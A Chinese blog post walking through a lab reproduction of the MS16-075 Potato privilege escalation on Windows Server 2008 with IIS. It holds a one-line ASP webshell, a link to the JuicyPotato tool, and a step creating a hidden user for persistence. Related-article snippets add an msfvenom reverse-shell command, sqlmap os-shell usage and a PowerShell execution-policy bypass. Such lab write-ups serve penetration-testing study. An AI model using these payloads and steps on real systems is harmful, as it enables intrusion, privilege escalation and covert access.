Windows烂土豆提权复现(MS16-075)

最新推荐文章于 2024-04-18 19:36:30 发布
最新推荐文章于 2024-04-18 19:36:30 发布
阅读量876 收藏 16
点赞数 18
文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xnxqwzy/article/details/136268987
版权
前言

烂土豆(Rotten Potato) MS16-075
提权是一个本地提权,只针对本地用户,不支持域用户,当攻击者转发适用于在同一计算机上运行的其他服务的身份验证请求时,Microsoft 服务器消息块
(SMB)
中存在特权提升漏洞。成功利用此漏洞的攻击者可以使用提升的特权执行任意代码。攻击者登录系统后,运行一个经特殊设计的应用程序利用此漏洞,从而控制受影响的系统。
影响版本: Windows 7、Windows 8.1、Windows 10、Windows Server 2008、Windows Server
2012 等,以上版本系统若未安装相应补丁,则大概率存在此漏洞。

提权原理

  1. 欺骗 “NT AUTHORITY\\SYSTEM”账户通过NTLM认证到我们控制的TCP终端。
  2. 对这个认证过程使用中间人攻击(NTLM重放),为“NT
    AUTHORITY\\SYSTEM”账户本地协商一个安全令牌。这个过程是通过一系列的Windows API调用实现的。

模仿这个令牌。只有具有“模仿安全令牌权限”的账户才能去模仿别人的令牌。一般大多数的服务型账户(IIS、MSSQL等)有这个权限,大多数用户级的账户没有这个权限。
4.
重点是模拟令牌,在提权的过程中,我们最好已经获得了一个具有SeImpersonate权限或其他同等权限的账户,通常Windows中的许多服务具有此权限(IIS和SQL
Server等)

实验环境搭建

漏洞主机:Windows Server 2008 + IIS服务器

复现步骤

  • 安装好一台Windows Server 2008的虚拟机,然后再添加Web 服务器(IIS)

  • 安装完成后,再进入到网站的默认目录下,创建一个upload 的文件夹,并且给与everyone都可以执行的权限

  • 然后再到upload文件下创建一个.asp的木马文件,用于菜刀连接(模拟上传木马)

    <%execute request(“a”)%>

  • 木马上传成功后就直接用菜刀连接,接下来使用命令行查看当前用户的权限,​ 此处发现其拥有SeImpersonate权限

  • 接下来使用菜刀上传漏洞的利用工具:JuicyPotatoweb.exe

    https://github.com/shanfenglan/test/tree/master/juicypotato

  • 上传成功后,然后使用JuicyPotatoweb.exe执行如下命令进行提权

  • 看到成功执行,并且是以system的权限来执行whoami的,那就继续通过这个命令行,创建一个隐藏用户

  • 创建成功后,直接使用隐藏用户来登录

网络安全工程师(白帽子)企业级学习路线

第一阶段:安全基础(入门)

img

第二阶段:Web渗透(初级网安工程师)

img

第三阶段:进阶部分(中级网络安全工程师)

img

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

学习资源分享

程序员菠萝
关注
  • 18
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ms16-016提权
qq_54713392的博客
05-08 1204
ms16-016提权 简介:靶机需32位windows系统 攻击机:kali IP地址为:192.168.32.132 目标机:windows32 IP地址:192.168.32.135 先ping两台主机看是否通 步骤: 1)生成木马,设置本地ip地址192.168.32.132和端口号4444 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.32.132 LPORT=4444 -f exe > /root/test.exe 2)
〖教程〗Ladon提权MS16-135参数版(WIN7-2016)
K8哥哥
08-08 1256
漏洞名称 Win32k 特权提升漏洞(MS16-135)(CVE-2016-7255) 漏洞等级 高危 漏洞类型 本地提权 漏洞描述 如果 Windows 内核模式驱动程序无法正确处理内存中对象,则会存在多个特权提升漏洞。成功利用此漏洞的攻击者可以在内核模式下运行任意代码。攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。 攻击者必须先登录系统,然后才能利用这些漏洞。然后攻击者可以运行一个为利用这些漏洞而经特殊设计的应用程序,从而控制受影响的系统。该更新通过更正 Windows
土豆 (ms16-075) 提权方法
越努力 越自由
03-11 9999
所谓的土豆提权就是俗称的MS16-075,其是一个本地提权,是针对本地用户的,不能用于域用户。可以将Windows工作站上的特权从最低级别提升到“ NT AUTHORITY \ SYSTEM” – Windows计算机上可用的最高特权级别。
土豆提权神器(改进版)
04-15
本工具从原版土豆工具里进行修改以避免每次在使用时都需要输入复杂的命令,使用方法如下: 假如操作系统是windows 2008 R2,则在命令提示符中,首先切换到该工具所在的目录,然后输入JuicyPotato.exe -p "这里粘贴想要执行的系统命令" 即可获得system权限(该工具在git hubu上)。具体的使用方法请查看本人的文章:服务器提权常见方法介绍。 本着免费分享的原则,下载时不需要扣除用户的积分,可放心和使用。同时由于本工具涉及的敏感操作,杀毒软件一定会报毒,可添加信任,如果不放心,请在虚拟机中使用。
土豆(JuicyPotato)提权
热门推荐
Shanfenglan's blog
11-18 9万+
CATALOG1.前言2.原理2.1前置知识2.2juicypotato实现流程3.实现3.1提权结果3.2实现步骤3.2.1先使用powershell脚本找到可用的CLSID3.2.2再使用bat文件确定能利用的CLSID3.2.3使用juicypotato进行利用4.防御方法5.参考文章 1.前言 很有名的一个提权工具,今天对其做一个小小的使用总结。 2.原理 2.1前置知识 首先我们要知道: 使用DCOM的时候,如果以服务方式远程连接,那么为system权限,例如BITS服务。 使用DCOM可以通过
土豆提权MS16-075)--令牌窃取提权
bring_coco的博客
05-28 3985
漏洞介绍 当攻击者转发适用于在同一计算机上运行的其他服务的身份验证请求时,Microsoft 服务器消息块 (SMB) 中存在特权提升漏洞。成功利用此漏洞的攻击者可以使用提升的特权执行任意代码。 若要利用此漏洞,攻击者首先必须登录系统。然后,攻击者可以运行一个为利用此漏洞而经特殊设计的应用程序,从而控制受影响的系统。此更新通过更正 Windows 服务器消息块 (SMB) 服务器处理凭据转发请求的方式来修复此漏洞。 注:土豆(Rotten Potato)提权是一个本地提权,是针对本地用户的,不能用于域用户
Windows提权土豆
最新发布
2401_84275261的博客
04-18 618
我们今天利用土豆来对windows进行提权;靶机:windows-2003我们先用kali的msf工具生成一个木马。msf启动命令:msfconsole,或者直接输入命令来生成木马这里先启动msf然后我们生成木马最后通过通过中国菜刀将我们生成的木马放入目标网站启动msf的监听状态设置参数。接下来用最常规的方法提权,发现提权失败我们需要查找可以利用的漏洞,今天以“土豆”为例作为演示设置对应的参数,并开始攻击结果还是不能成功拿到权限,我们可以用伪造token值(在身份认证中,token是令牌(临时)的意思,
土豆Juicypotato提权原理和利用
god_Zeo的安全博客
05-25 1万+
0x00 Potato(土豆提权的原理: 所谓的土豆提权就是俗称的MS16-075 可以将Windows工作站上的特权从最低级别提升到“ NT AUTHORITY \ SYSTEM” – Windows计算机上可用的最高特权级别。 一、简单的原理: 攻击者可以诱骗用户尝试使用NTLM对他的计算机进行身份验证,则他可以将该身份验证尝试中继到另一台计算机! Microsoft通过使用已经进行的质询来禁止同协议NTLM身份验证来对此进行修补。这意味着从一个主机回到自身的SMB-> SMB NTLM中继
MS16-016漏洞复现
qq_45440239的博客
06-01 1803
复现MS16-016漏洞
Windows提权--小迪权限提升--土豆--DLL劫持--udf提权
z2560088的博客
02-13 4287
针对环境 windows有两种环境,一种是web网站拿到的webshell环境,一般是低权限的用户,(jsp除外,拿到webshell就是system权限)另一种是本地的环境,可能是服务器为管理某项服务创建的低权限用户。不同环境下的操作会有所不同。 提权方法 1.win溢出漏洞(如何判断类型和利用) 信息收集-补丁筛选-利用 MSF 或特定 EXP-执行-西瓜到手 Vulmap,Wes,WindowsVulnScan 对比,exp 在哪里获取? 利用wes进行补丁筛选 2.数据库提权 ...
ms16-032本地溢出漏洞
06-27
【标题】:“ms16-032本地溢出漏洞”是微软在2016年发布的一个重要的安全更新,该漏洞主要影响Windows操作系统。这个漏洞的命名方式遵循了微软的传统,即“ms”代表微软,“16”代表2016年,而“032”则可能是该年中...
内网渗透-内网穿透&猕猴桃抓密码提权&土豆提权
weixin_45701675的博客
11-28 6431
内网渗透 内网穿透 内网提权
sqlmap注入及ms16-075提权总结
weixin_33696106的博客
06-04 948
sqlmap注入及ms16-075提权总结(1)sqlmap执行命令sqlmap.py -r 1**.***.***.***.txtsqlmap.py -r 1**.***.***.***.txt --is-dbsqlmap.py -r 1**.***.***.***.txt --password --batchsqlmap.py -r 1**.***.***.***.txt --os-shell...
ms16-075提权
lansefly1990的专栏
02-27 2851
利用windows-exploit-suggester.py脚本,查找系统未打补丁有哪些,脚本下载地址:https://github.com/AonCyberLabs/Windows-Exploit-Suggester 利用ms16-135内核漏洞提权, powershell -nop -exec bypass -c "& {Import-Module 'C:\Users ...
windows提权常用系统漏洞与对应的补丁编号
sweelg的博客
05-29 4445
CVE-2021-1732[Windows Win32k 提权漏洞] (Windows 10, 2019/20H2) CVE-2020-0787【Windows后台智能传输服务提权漏洞】(Windows 7/8/10、2008/2012/2016/2019) CVE-2020-0796[Microsoft 服务器消息块 3.1.1 (SMBv3) 协议处理某些请求的方式中存在一个远程代码执行漏洞,即“Windows SMBv3 客户端/服务器远程代码执行漏洞”] (Windows 1903/1909..
Windows提权
haoge1998的博客
04-25 4837
Windows提权 Windows基础知识 一、用户与用户组 在Windows中,不同用户有着不同的权限。主要权限包括有: 完全控制 修改 读取和执行 列出文件夹内容 读取 写入 1、内置用户 Administrator:系统管理员账号,拥有完全控制权 Guest:来宾账号,基本权限,默认时禁用 2、查看本地用户 net user 3、查看用户详细信息 net user darkid 用户也可以属于多个用户组,常见的用户组是 管理组(Administrators)、普通用户组(Users)、i
提权 - Windows 土豆/ dll劫持 /服务权限
acepanhuan的博客
03-01 1236
提权 - Windows 土豆/ dll劫持 /服务权限
【漏洞复现】Metasploit下利用ms16-075提权
cj_Hydra's Blog
04-13 4000
前言: ms16-075漏洞介绍: Windows SMB 服务器特权提升漏洞(CVE漏洞编号:CVE-2016-3225)当攻击者转发适用于在同一计算机上运行的其他服务的身份验证请求时,Microsoft 服务器消息块 (SMB) 中存在特权提升漏洞,成功利用此漏洞的攻击者可以使用提升的特权执行任意代码。若要利用此漏洞,攻击者首先必须登录系统。然后,攻击者可以运行一个为利用此漏洞而经特殊设计的应...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值